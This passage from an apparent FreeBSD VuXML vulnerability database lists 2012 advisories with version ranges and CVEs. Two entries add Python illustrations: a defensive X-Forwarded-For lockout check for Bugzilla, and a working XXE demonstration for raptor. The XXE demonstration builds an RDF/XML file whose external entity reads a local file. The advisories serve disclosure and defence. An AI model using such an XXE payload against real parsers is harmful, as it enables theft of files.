</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2141</cvename>
<url>https://bugzilla.redhat.com/show_bug.cgi?id=815813</url>
<url>http://www.openwall.com/lists/oss-security/2012/04/26/2</url>
</references>
<dates>
<discovery>2012-04-26</discovery>
<entry>2012-04-27</entry>
</dates>
</vuln>
<vuln vid="380e8c56-8e32-11e1-9580-4061862b8c22">
<topic>mozilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>firefox</name>
<range><gt>11.0,1</gt><lt>12.0,1</lt></range>
<range><lt>10.0.4,1</lt></range>
</package>
<package>
<name>linux-firefox</name>
<range><lt>10.0.4,1</lt></range>
</package>
<package>
<name>linux-seamonkey</name>
<range><lt>2.9</lt></range>
</package>
<package>
<name>linux-thunderbird</name>
<range><lt>10.0.4</lt></range>
</package>
<package>
<name>seamonkey</name>
<range><lt>2.9</lt></range>
</package>
<package>
<name>thunderbird</name>
<range><gt>11.0</gt><lt>12.0</lt></range>
<range><lt>10.0.4</lt></range>
</package>
<package>
<name>libxul</name>
<range><gt>1.9.2.*</gt><lt>10.0.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Mozilla Project reports:</p>
<blockquote cite="http://www.mozilla.org/security/known-vulnerabilities/">
<p>MFSA 2012-20 Miscellaneous memory safety hazards (rv:12.0/ rv:10.0.4)</p>
<p>MFSA 2012-21 Multiple security flaws fixed in FreeType v2.4.9</p>
<p>MFSA 2012-22 use-after-free in IDBKeyRange</p>
<p>MFSA 2012-23 Invalid frees causes heap corruption in gfxImageSurface</p>
<p>MFSA 2012-24 Potential XSS via multibyte content processing errors</p>
<p>MFSA 2012-25 Potential memory corruption during font rendering using cairo-dwrite</p>
<p>MFSA 2012-26 WebGL.drawElements may read illegal video memory due to FindMaxUshortElement error</p>
<p>MFSA 2012-27 Page load short-circuit can lead to XSS</p>
<p>MFSA 2012-28 Ambiguous IPv6 in Origin headers may bypass webserver access restrictions</p>
<p>MFSA 2012-29 Potential XSS through ISO-2022-KR/ISO-2022-CN decoding issues</p>
<p>MFSA 2012-30 Crash with WebGL content using textImage2D</p>
<p>MFSA 2012-31 Off-by-one error in OpenType Sanitizer</p>
<p>MFSA 2012-32 HTTP Redirections and remote content can be read by javascript errors</p>
<p>MFSA 2012-33 Potential site identity spoofing when loading RSS and Atom feeds</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-1187</cvename>
<cvename>CVE-2011-3062</cvename>
<cvename>CVE-2012-0467</cvename>
<cvename>CVE-2012-0468</cvename>
<cvename>CVE-2012-0469</cvename>
<cvename>CVE-2012-0470</cvename>
<cvename>CVE-2012-0471</cvename>
<cvename>CVE-2012-0472</cvename>
<cvename>CVE-2012-0473</cvename>
<cvename>CVE-2012-0474</cvename>
<cvename>CVE-2012-0475</cvename>
<cvename>CVE-2012-0477</cvename>
<cvename>CVE-2012-0478</cvename>
<cvename>CVE-2012-0479</cvename>
<cvename>CVE-2012-1126</cvename>
<cvename>CVE-2012-1127</cvename>
<cvename>CVE-2012-1128</cvename>
<cvename>CVE-2012-1129</cvename>
<cvename>CVE-2012-1130</cvename>
<cvename>CVE-2012-1131</cvename>
<cvename>CVE-2012-1132</cvename>
<cvename>CVE-2012-1133</cvename>
<cvename>CVE-2012-1134</cvename>
<cvename>CVE-2012-1135</cvename>
<cvename>CVE-2012-1136</cvename>
<cvename>CVE-2012-1137</cvename>
<cvename>CVE-2012-1138</cvename>
<cvename>CVE-2012-1139</cvename>
<cvename>CVE-2012-1140</cvename>
<cvename>CVE-2012-1141</cvename>
<cvename>CVE-2012-1142</cvename>
<cvename>CVE-2012-1143</cvename>
<cvename>CVE-2012-1144</cvename>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-20.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-21.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-22.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-23.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-24.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-25.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-26.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-27.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-28.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-29.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-30.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-31.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-32.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-33.html</url>
</references>
<dates>
<discovery>2012-04-24</discovery>
<entry>2012-04-24</entry>
</dates>
</vuln>
<vuln vid="a04247f1-8d9c-11e1-93c7-00215c6a37bb">
<topic>Dokuwiki -- cross site scripting vulnerability</topic>
<affects>
<package>
<name>dokuwiki</name>
<range><lt>20120125_1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Andy Webber reports:</p>
<blockquote cite="http://bugs.dokuwiki.org/index.php?do=details&amp;task_id=2487">
<p>Add User appears to be vulnerable to Cross Site Request Forgery (CSRF/XSRF).</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2128</cvename>
<cvename>CVE-2012-2129</cvename>
</references>
<dates>
<discovery>2012-04-17</discovery>
<entry>2012-04-23</entry>
</dates>
</vuln>
<vuln vid="1c5abbe2-8d7f-11e1-a374-14dae9ebcf89">
<topic>asterisk -- multiple vulnerabilities</topic>
<affects>
<package>
<name>asterisk16</name>
<range><gt>1.6.*</gt><lt>1.6.2.24</lt></range>
</package>
<package>
<name>asterisk18</name>
<range><gt>1.8.*</gt><lt>1.8.11.1</lt></range>
</package>
<package>
<name>asterisk10</name>
<range><gt>10.*</gt><lt>10.3.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Asterisk project reports:</p>
<blockquote cite="https://www.asterisk.org/security">
<p>Remote Crash Vulnerability in SIP Channel Driver</p>
<p>Heap Buffer Overflow in Skinny Channel Driver</p>
<p>Asterisk Manager User Unauthorized Shell Access</p>
</blockquote>
</body>
</description>
<references>
<url>http://downloads.digium.com/pub/security/AST-2012-004.html</url>
<cvename>CVE-2012-2414</cvename>
<url>http://downloads.digium.com/pub/security/AST-2012-005.html</url>
<cvename>CVE-2012-2415</cvename>
<url>http://downloads.digium.com/pub/security/AST-2012-006.html</url>
<cvename>CVE-2012-2416</cvename>
</references>
<dates>
<discovery>2012-04-23</discovery>
<entry>2012-04-23</entry>
</dates>
</vuln>
<vuln vid="b384cc5b-8d56-11e1-8d7b-003067b2972c">
<topic>wordpress -- multiple vulnerabilities</topic>
<affects>
<package>
<name>wordpress</name>
<range><lt>3.3.2,1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Wordpress reports:</p>
<blockquote cite="https://codex.wordpress.org/Version_3.3.2">
<p>External code has been updated to
non-vulnerable versions.
In addition the following bugs have been fixed:</p>
<ul>
<li>Limited privilege escalation where a site administrator could
deactivate network-wide plugins when running a WordPress network under
particular circumstances.</li>
<li>Cross-site scripting vulnerability when making URLs
clickable.</li>
<li>Cross-site scripting vulnerabilities in redirects after posting
comments in older browsers, and when filtering URLs.</li>
</ul>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2399</cvename>
<cvename>CVE-2012-2400</cvename>
<cvename>CVE-2012-2401</cvename>
<cvename>CVE-2012-2402</cvename>
<cvename>CVE-2012-2403</cvename>
<cvename>CVE-2012-2404</cvename>
<url>https://codex.wordpress.org/Version_3.3.2</url>
</references>
<dates>
<discovery>2012-04-20</discovery>
<entry>2012-04-23</entry>
</dates>
</vuln>
<vuln vid="7184f92e-8bb8-11e1-8d7b-003067b2972c">
<topic>OpenSSL -- integer conversions result in memory corruption</topic>
<affects>
<package>
<name>openssl</name>
<range><lt>1.0.1_1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>OpenSSL security team reports:</p>
<blockquote cite="http://www.openssl.org/news/secadv_20120419.txt">
<p>A potentially exploitable vulnerability has been discovered in the OpenSSL
function asn1_d2i_read_bio.
Any application which uses BIO or FILE based functions to read untrusted DER
format data is vulnerable. Affected functions are of the form d2i_*_bio or
d2i_*_fp, for example d2i_X509_bio or d2i_PKCS12_fp.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2110</cvename>
<mlist msgid="20120419103522.GN30784@cmpxchg8b.com">http://marc.info/?l=full-disclosure&amp;m=133483221408243</mlist>
<url>http://www.openssl.org/news/secadv_20120419.txt</url>
</references>
<dates>
<discovery>2012-04-19</discovery>
<entry>2012-04-21</entry>
</dates>
</vuln>
<vuln vid="09c87973-8b9d-11e1-b393-20cf30e32f6d">
<topic>bugzilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>bugzilla</name>
<range><ge>3.6.0</ge><lt>3.6.9</lt></range>
<range><ge>4.0.0</ge><lt>4.0.6</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<h1>A Bugzilla Security Advisory reports:</h1>
<blockquote cite="http://www.bugzilla.org/security/3.6.8/">
<p>The following security issues have been discovered in
Bugzilla:</p>
<h1>Unauthorized Access</h1>
<p>Due to a lack of proper validation of the X-FORWARDED-FOR
header of an authentication request, an attacker could bypass
the current lockout policy used for protection against brute-
force password discovery. This vulnerability can only be
exploited if the 'inbound_proxies' parameter is set.</p>
<h1>Cross Site Scripting</h1>
<p>A JavaScript template used by buglist.cgi could be used
by a malicious script to permit an attacker to gain access
to some information about bugs he would not normally be
allowed to see, using the victim's credentials. To be
exploitable, the victim must be logged in when visiting
the attacker's malicious page.</p>
<p>All affected installations are encouraged to upgrade as soon
as possible.</p>
</blockquote>
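<p>As an added illustration (not Bugzilla code), the following Python models the check the advisory describes as missing: a brute-force lockout keyed on the client address may honour X-Forwarded-For only when the TCP peer is one of the operator's configured inbound proxies, and even then only the right-most hop that is not itself one of those proxies. The proxy range, addresses and threshold are constructed for the example.</p>
<pre><![CDATA[
```python
import ipaddress
from collections import defaultdict

# Added example, not Bugzilla code. The inbound proxy range, addresses and
# lockout threshold below are constructed for the demonstration.


def effective_client_ip(remote_addr, xff_header, inbound_proxies):
    """Return the address a brute-force lockout should be keyed on.

    remote_addr     -- TCP peer address as seen by the web server
    xff_header      -- raw X-Forwarded-For header value, or None
    inbound_proxies -- CIDR strings for the proxies the operator controls
    """
    trusted = [ipaddress.ip_network(cidr) for cidr in inbound_proxies]

    def is_trusted_proxy(addr):
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            return False
        return any(ip in net for net in trusted)

    # The peer is not one of our proxies: the header is attacker-controlled
    # and must not influence the lockout key at all.
    if not is_trusted_proxy(remote_addr):
        return remote_addr

    # Walk the chain from the right (nearest hop first). The first address
    # that is not one of our proxies is the client the last trusted proxy
    # talked to; anything left of it was supplied by that client itself.
    hops = [h.strip() for h in (xff_header or "").split(",") if h.strip()]
    for hop in reversed(hops):
        if is_trusted_proxy(hop):
            continue
        try:
            return str(ipaddress.ip_address(hop))
        except ValueError:
            # Unparseable hop: fall back to the peer rather than keying the
            # lockout on an arbitrary attacker-chosen string.
            return remote_addr
    # Empty header, or a chain consisting only of our own proxies.
    return remote_addr


class LoginLockout:
    """Per-client failed-login counter keyed on effective_client_ip()."""

    def __init__(self, inbound_proxies, max_failures=5):
        self.inbound_proxies = list(inbound_proxies)
        self.max_failures = max_failures
        self.failures = defaultdict(int)

    def _key(self, remote_addr, xff_header):
        return effective_client_ip(remote_addr, xff_header, self.inbound_proxies)

    def record_failure(self, remote_addr, xff_header=None):
        key = self._key(remote_addr, xff_header)
        self.failures[key] += 1
        return key

    def is_locked(self, remote_addr, xff_header=None):
        return self.failures[self._key(remote_addr, xff_header)] >= self.max_failures


def forged_header_lockout(max_failures=3):
    """Attacker connects directly (peer 203.0.113.7, not a proxy) and forges a
    different X-Forwarded-For on every attempt. Returns True if the lockout
    still trips, i.e. the forged header was ignored."""
    lock = LoginLockout(inbound_proxies=["10.0.0.0/8"], max_failures=max_failures)
    for i in range(max_failures):
        lock.record_failure("203.0.113.7", "198.51.100.%d" % i)
    return lock.is_locked("203.0.113.7", "198.51.100.99")
```
]]></pre>
<p>Without the peer check, an attacker talking directly to the web server rotates the header on every attempt and each failure is counted against a different fabricated address; with it, the forged header is ignored and the lockout keys on the real peer. Behind a trusted proxy, a client that prepends its own entries to the header still ends up keyed on the right-most untrusted hop, which is the one the proxy actually saw.</p>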
</body>
</description>
<references>
<cvename>CVE-2012-0465</cvename>
<cvename>CVE-2012-0466</cvename>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=728639</url>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=745397</url>
</references>
<dates>
<discovery>2012-04-18</discovery>
<entry>2012-04-21</entry>
</dates>
</vuln>
<vuln vid="67516177-88ec-11e1-9a10-0023ae8e59f0">
<topic>typo3 -- Cross-Site Scripting</topic>
<affects>
<package>
<name>typo3</name>
<range><ge>4.6.0</ge><le>4.6.7</le></range>
<range><ge>4.5.0</ge><le>4.5.14</le></range>
<range><ge>4.4.0</ge><le>4.4.14</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The TYPO3 Security Team reports:</p>
<blockquote cite="https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2012-002/">
<p>Failing to properly encode the output, the default TYPO3
Exception Handler is susceptible to Cross-Site Scripting. We
are not aware of a possibility to exploit this vulnerability
without third party extensions being installed that put user
input in exception messages. However, it has come to our
attention that extensions using the extbase MVC framework can
be used to exploit this vulnerability if these extensions
accept objects in controller actions.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2112</cvename>
<url>https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2012-002/</url>
</references>
<dates>
<discovery>2012-04-17</discovery>
<entry>2012-04-18</entry>
</dates>
</vuln>
<vuln vid="0c14dfa7-879e-11e1-a2a0-00500802d8f7">
<topic>nginx -- Buffer overflow in the ngx_http_mp4_module</topic>
<affects>
<package>
<name>nginx</name>
<range><lt>1.0.15</lt></range>
</package>
<package>
<name>nginx-devel</name>
<range><lt>1.1.19</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The nginx project reports:</p>
<blockquote cite="http://nginx.org/en/security_advisories.html">
<p>Buffer overflow in the ngx_http_mp4_module</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2089</cvename>
<url>http://nginx.org/en/security_advisories.html</url>
</references>
<dates>
<discovery>2012-04-12</discovery>
<entry>2012-04-16</entry>
</dates>
</vuln>
<vuln vid="c80a3d93-8632-11e1-a374-14dae9ebcf89">
<topic>phpmyfaq -- Remote PHP Code Execution Vulnerability</topic>
<affects>
<package>
<name>phpmyfaq</name>
<range><lt>2.7.5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The phpMyFAQ project reports:</p>
<blockquote cite="http://www.phpmyfaq.de/advisory_2011-10-25.php">
<p>The bundled ImageManager library allows injection of arbitrary
PHP code to execute arbitrary PHP code and upload malware and
trojan horses.</p>
</blockquote>
</body>
</description>
<references>
<url>http://www.phpmyfaq.de/advisory_2012-04-14.php</url>
</references>
<dates>
<discovery>2012-04-14</discovery>
<entry>2012-04-14</entry>
</dates>
</vuln>
<vuln vid="607d2108-a0e4-423a-bf78-846f2a8f01b0">
<topic>puppet -- Multiple Vulnerabilities</topic>
<affects>
<package>
<name>puppet</name>
<range><gt>2.7.*</gt><lt>2.7.12_1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<blockquote cite="http://puppetlabs.com/security/">
<p>Multiple vulnerabilities exist in puppet that can result in
arbitrary code execution, arbitrary file read access, denial of
service, and arbitrary file write access. Please review the
details in each of the CVEs for additional information.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1906</cvename>
<cvename>CVE-2012-1986</cvename>
<cvename>CVE-2012-1987</cvename>
<cvename>CVE-2012-1988</cvename>
<cvename>CVE-2012-1989</cvename>
<url>http://puppetlabs.com/security/cve/cve-2012-1906/</url>
<url>http://puppetlabs.com/security/cve/cve-2012-1986/</url>
<url>http://puppetlabs.com/security/cve/cve-2012-1987/</url>
<url>http://puppetlabs.com/security/cve/cve-2012-1988/</url>
<url>http://puppetlabs.com/security/cve/cve-2012-1989/</url>
</references>
<dates>
<discovery>2012-03-26</discovery>
<entry>2012-04-10</entry>
</dates>
</vuln>
<vuln vid="baf37cd2-8351-11e1-894e-00215c6a37bb">
<topic>samba -- "root" credential remote code execution</topic>
<affects>
<package>
<name>samba34</name>
<range><gt>3.4.*</gt><lt>3.4.16</lt></range>
</package>
<package>
<name>samba35</name>
<range><gt>3.5.*</gt><lt>3.5.14</lt></range>
</package>
<package>
<name>samba36</name>
<range><gt>3.6.*</gt><lt>3.6.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Samba development team reports:</p>
<blockquote cite="http://www.samba.org/samba/security/CVE-2012-1182">
<p>Samba versions 3.6.3 and all versions previous to this
are affected by a vulnerability that allows remote code
execution as the "root" user from an anonymous connection.</p>
<p>As this does not require an authenticated connection it
is the most serious vulnerability possible in a program,
and users and vendors are encouraged to patch their Samba
installations immediately.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1182</cvename>
</references>
<dates>
<discovery>2012-04-10</discovery>
<entry>2012-04-10</entry>
</dates>
</vuln>
<vuln vid="7f448dc1-82ca-11e1-b393-20cf30e32f6d">
<topic>bugzilla Cross-Site Request Forgery</topic>
<affects>
<package>
<name>bugzilla</name>
<range><ge>4.0.0</ge><lt>4.0.5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>A Bugzilla Security Advisory reports:</p>
<blockquote cite="http://www.bugzilla.org/security/4.0.4/">
<p>The following security issues have been discovered in
Bugzilla:</p>
<ul>
<li>Due to a lack of validation of the enctype form attribute
when making POST requests to xmlrpc.cgi, a possible CSRF
vulnerability was discovered. If a user visits an HTML page
with some malicious HTML code in it, an attacker could make
changes to a remote Bugzilla installation on behalf of the
victim's account by using the XML-RPC API on a site running
mod_perl. Sites running under mod_cgi are not affected.
Also, the user would have had to be already logged in to the
target site for the vulnerability to work.</li>
</ul>
<p>All affected installations are encouraged to upgrade as soon
as possible.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0453</cvename>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=725663</url>
</references>
<dates>
<discovery>2012-02-22</discovery>
<entry>2012-04-10</entry>
</dates>
</vuln>
<vuln vid="20923a0d-82ba-11e1-8d7b-003067b2972c">
<topic>linux-flashplugin -- multiple vulnerabilities</topic>
<affects>
<package>
<name>linux-f10-flashplugin</name>
<range><lt>11.2r202.228</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Adobe reports:</p>
<blockquote cite="https://www.adobe.com/support/security/bulletins/apsb12-07.html">
<p>Multiple Priority 2 vulnerabilities could cause a crash and
potentially allow an attacker to take control of the affected
system.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0724</cvename>
<cvename>CVE-2012-0725</cvename>
<cvename>CVE-2012-0772</cvename>
<cvename>CVE-2012-0773</cvename>
<url>https://www.adobe.com/support/security/bulletins/apsb12-07.html</url>
</references>
<dates>
<discovery>2012-04-05</discovery>
<entry>2012-04-10</entry>
</dates>
</vuln>
<vuln vid="262b92fe-81c8-11e1-8899-001ec9578670">
<topic>png -- memory corruption/possible remote code execution</topic>
<affects>
<package>
<name>png</name>
<name>linux-f10-png</name>
<range><lt>1.4.11</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The PNG project reports:</p>
<blockquote cite="http://www.libpng.org/pub/png/libpng.html">
<p>libpng fails to correctly handle malloc() failures for text
chunks (in png_set_text_2()), which can lead to memory
corruption and the possibility of remote code execution.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-3048</cvename>
<url>http://www.libpng.org/pub/png/libpng.html</url>
</references>
<dates>
<discovery>2012-03-29</discovery>
<entry>2012-04-08</entry>
</dates>
</vuln>
<vuln vid="462e2d6c-8017-11e1-a571-bcaec565249c">
<topic>freetype -- multiple vulnerabilities</topic>
<affects>
<package>
<name>freetype2</name>
<range><lt>2.4.9</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Freetype project reports:</p>
<blockquote cite="https://sourceforge.net/projects/freetype/files/freetype2/2.4.9/README/view">
<p>Multiple vulnerabilities exist in freetype that can result in
application crashes and remote code execution. Please review
the details in each of the CVEs for additional information.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1126</cvename>
<cvename>CVE-2012-1127</cvename>
<cvename>CVE-2012-1128</cvename>
<cvename>CVE-2012-1129</cvename>
<cvename>CVE-2012-1130</cvename>
<cvename>CVE-2012-1131</cvename>
<cvename>CVE-2012-1132</cvename>
<cvename>CVE-2012-1133</cvename>
<cvename>CVE-2012-1134</cvename>
<cvename>CVE-2012-1135</cvename>
<cvename>CVE-2012-1136</cvename>
<cvename>CVE-2012-1137</cvename>
<cvename>CVE-2012-1138</cvename>
<cvename>CVE-2012-1139</cvename>
<cvename>CVE-2012-1140</cvename>
<cvename>CVE-2012-1141</cvename>
<cvename>CVE-2012-1142</cvename>
<cvename>CVE-2012-1143</cvename>
<cvename>CVE-2012-1144</cvename>
<url>https://sourceforge.net/projects/freetype/files/freetype2/2.4.9/README/view</url>
<url>https://bugzilla.redhat.com/show_bug.cgi?id=806270</url>
</references>
<dates>
<discovery>2012-03-08</discovery>
<entry>2012-04-06</entry>
</dates>
</vuln>
<vuln vid="49314321-7fd4-11e1-9582-001b2134ef46">
<topic>mutt-devel -- failure to check SMTP TLS server certificate</topic>
<affects>
<package>
<name>mutt-devel</name>
<range><lt>1.5.21_4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Dave B reports on Full Disclosure:</p>
<blockquote cite="http://seclists.org/fulldisclosure/2011/Mar/87">
<p>It seems that mutt fails to check the validity of a SMTP
servers certificate during a TLS connection. [...]
This means that an attacker could potentially MITM a
mutt user connecting to their SMTP server even when the
user has forced a TLS connection.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-1429</cvename>
<url>http://seclists.org/fulldisclosure/2011/Mar/87</url>
</references>
<dates>
<discovery>2012-03-08</discovery>
<entry>2012-04-06</entry>
</dates>
</vuln>
<vuln vid="7289214f-7c55-11e1-ab3b-000bcdf0a03b">
<topic>libpurple -- Remote DoS via an MSN OIM message that lacks UTF-8 encoding</topic>
<affects>
<package>
<name>libpurple</name>
<range><lt>2.10.2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>US-CERT reports:</p>
<blockquote cite="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1178">
<p>The msn_oim_report_to_user function in oim.c in the MSN protocol
plugin in libpurple in Pidgin before 2.10.2 allows remote servers
to cause a denial of service (application crash) via an OIM message
that lacks UTF-8 encoding.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1178</cvename>
</references>
<dates>
<discovery>2012-03-15</discovery>
<entry>2012-04-01</entry>
</dates>
</vuln>
<vuln vid="a81161d2-790f-11e1-ac16-e0cb4e266481">
<topic>phpMyAdmin -- Path disclosure due to missing verification of file presence</topic>
<affects>
<package>
<name>phpMyAdmin</name>
<range><gt>3.4</gt><lt>3.4.10.2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The phpMyAdmin development team reports:</p>
<blockquote cite="http://www.phpmyadmin.net/home_page/security/PMASA-2012-2.php">
<p>The show_config_errors.php scripts did not validate the presence
of the configuration file, so an error message shows the full path
of this file, leading to possible further attacks. For the error
messages to be displayed, php.ini's error_reporting must be set to
E_ALL and display_errors must be On (these settings are not
recommended on a production server in the PHP manual).</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1902</cvename>
<url>http://www.phpmyadmin.net/home_page/security/PMASA-2012-2.php</url>
</references>
<dates>
<discovery>2012-03-28</discovery>
<entry>2012-03-28</entry>
</dates>
</vuln>
<vuln vid="60f81af3-7690-11e1-9423-00235a5f2c9a">
<topic>raptor/raptor2 -- XXE in RDF/XML File Interpretation</topic>
<affects>
<package>
<name>raptor2</name>
<range><lt>2.0.7</lt></range>
</package>
<package>
<name>raptor</name>
<range><lt>1.4.21_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Timothy D. Morgan reports:</p>
<blockquote cite="http://www.vsecurity.com/resources/advisory/20120324-1/">
<p>In December 2011, VSR identified a vulnerability in multiple open
source office products (including OpenOffice, LibreOffice, KOffice,
and AbiWord) due to unsafe interpretation of XML files with custom
entity declarations. Deeper analysis revealed that the
vulnerability was caused by acceptance of external entities by the
libraptor library, which is used by librdf and is in turn used by
these office products.</p>
<p>In the context of office applications, these vulnerabilities could
allow for XML External Entity (XXE) attacks resulting in file theft
and a loss of user privacy when opening potentially malicious ODF
documents. For other applications which depend on librdf or
libraptor, potentially serious consequences could result from
accepting RDF/XML content from untrusted sources, though the impact
may vary widely depending on the context.</p>
</blockquote>
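<p>As an added example (not raptor or librdf code), the following Python shows the XXE class the advisory describes using the Python standard library's SAX parser, which expands external general entities only when the application enables feature_external_ges. A constructed RDF/XML document declares a SYSTEM entity pointing at a local file; parsed with expansion enabled, the file's contents appear in the document's character data, parsed with it disabled they do not. The file name and the document are made up for the demonstration.</p>
<pre><![CDATA[
```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Added example, not raptor/librdf code. The secret file and the RDF/XML
# document are constructed for the demonstration.


class TextCollector(ContentHandler):
    """Accumulate character data so we can see what the parser expanded."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)

    def text(self):
        return "".join(self.chunks)


def parse_character_data(document, resolve_external_entities):
    """Parse `document` (bytes) and return its character data.

    resolve_external_entities=True is the unsafe configuration: a SYSTEM
    entity naming a local file is opened and its contents inlined. With the
    feature off (the stdlib default) the reference is not expanded.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(document))
    return handler.text()


def build_malicious_document(path):
    """An RDF/XML document whose internal DTD subset declares an external
    entity and references it inside a literal."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE rdf:RDF [\n'
        '  <!ENTITY xxe SYSTEM "%s">\n'
        ']>\n'
        '<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"\n'
        '         xmlns:dc="http://purl.org/dc/elements/1.1/">\n'
        '  <rdf:Description rdf:about="http://example.invalid/doc">\n'
        '    <dc:title>&xxe;</dc:title>\n'
        '  </rdf:Description>\n'
        '</rdf:RDF>\n' % path
    ).encode("utf-8")


def demo():
    """Return (text_with_expansion, text_without_expansion) for the same
    document, where the entity points at a file only the victim can read."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = os.path.join(tmp, "secret.txt")
        with open(secret_path, "w") as f:
            f.write("top secret")
        doc = build_malicious_document(secret_path)
        leaked = parse_character_data(doc, resolve_external_entities=True)
        safe = parse_character_data(doc, resolve_external_entities=False)
    return leaked, safe
```
]]></pre>
<p>In an office suite the literal would be the value of some metadata field that ends up in the saved document or in a later request, which is the file theft the advisory describes. The remedy is the same in any parser: refuse to resolve external entities (and external DTDs) for content from untrusted sources, and treat their presence as a reason to reject the document rather than silently skip them.</p>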
</body>
</description>
<references>
<cvename>CVE-2012-0037</cvename>
<url>http://seclists.org/fulldisclosure/2012/Mar/281</url>
<url>http://www.vsecurity.com/resources/advisory/20120324-1/</url>
</references>
<dates>
<discovery>2012-03-24</discovery>
<entry>2012-03-25</entry>
</dates>
</vuln>
<vuln vid="42a2c82a-75b9-11e1-89b4-001ec9578670">
<topic>quagga -- multiple vulnerabilities</topic>
<affects>
<package>
<name>quagga</name>
<range><lt>0.99.20.1</lt></range>
</package>
<package>
<name>quagga-re</name>
<range><lt>0.99.17.8</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>CERT reports:</p>
<blockquote cite="http://www.kb.cert.org/vuls/id/551715">
<p>The ospfd implementation of OSPF in Quagga allows a remote
attacker (on a local network segment with OSPF enabled) to cause
a denial of service (daemon aborts due to an assert) with a
malformed OSPF LS-Update message.</p>
<p>The ospfd implementation of OSPF in Quagga allows a remote
attacker (on a local network segment with OSPF enabled) to cause
a denial of service (daemon crash) with a malformed OSPF Network-
LSA message.</p>
<p>The bgpd implementation of BGP in Quagga allows remote attackers
to cause a denial of service (daemon aborts due to an assert) via
BGP Open message with an invalid AS4 capability.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0249</cvename>
<cvename>CVE-2012-0250</cvename>
<cvename>CVE-2012-0255</cvename>
<url>http://www.kb.cert.org/vuls/id/551715</url>
</references>
<dates>
<discovery>2012-03-23</discovery>
<entry>2012-03-24</entry>
<modified>2012-03-26</modified>
</dates>
</vuln>
<vuln vid="acab2f88-7490-11e1-865f-00e0814cab4e">
